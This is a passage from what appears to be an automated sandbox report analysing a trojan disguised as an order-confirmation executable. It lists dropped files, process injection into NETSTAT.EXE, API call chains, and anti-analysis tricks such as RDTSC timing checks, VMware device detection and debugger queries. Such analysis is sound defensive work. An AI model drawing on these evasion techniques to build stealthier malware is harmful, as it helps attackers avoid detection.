          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EC991 push esp; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EC9EC push esp; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032D89CE push edx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032D7E1A push ss; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EC46E push dword ptr [F84D205Dh]; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EB45C push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EC4E3 push ebx; ret
Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeFile created: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe
Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeFile created: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B45EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,KiUserCallbackDispatcher,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BB59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B533B7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000032D85E4 second address: 00000000032D85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NETSTAT.EXERDTSC instruction interceptor: First address: 00000000032D896E second address: 00000000032D8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_004088A0 rdtsc
          Source: C:\Windows\explorer.exe TID: 6908Thread sleep time: -90000s >= -30000s
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6688Thread sleep count: 42 > 30
          Source: C:\Windows\SysWOW64\NETSTAT.EXE TID: 6688Thread sleep time: -84000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Windows\SysWOW64\NETSTAT.EXELast function: Thread delayed
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeCode function: 0_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeCode function: 0_2_0040659C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exeCode function: 0_2_004027A1 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B94005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9494A GetFileAttributesW,FindFirstFileW,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9CD14 FindFirstFileW,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B9FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B93CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B45D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,
          Source: explorer.exe, 00000004.00000000.273506329.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.259478699.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.273198179.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000004.00000000.259620843.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000002.625682151.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000004.00000000.273568903.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000004.00000002.636275608.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000004.00000000.273198179.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000000.273198179.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000000.273568903.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000004.00000000.273198179.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_004088A0 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BA45D5 BlockInput,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B45240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B65CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BAC6D9 LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E9B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E09080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00EC2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E2C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E32990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E0C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E24120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E32AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E32ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00EBB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00EBB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E4927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ECEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E94257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E18A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E05210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E23A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E2DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00EC138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00EBD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E3B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E32397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E0DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E0DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00ED8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E0F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00EC131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00EC14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E86CF0 mov eax, dword ptr fs:[00000030h]
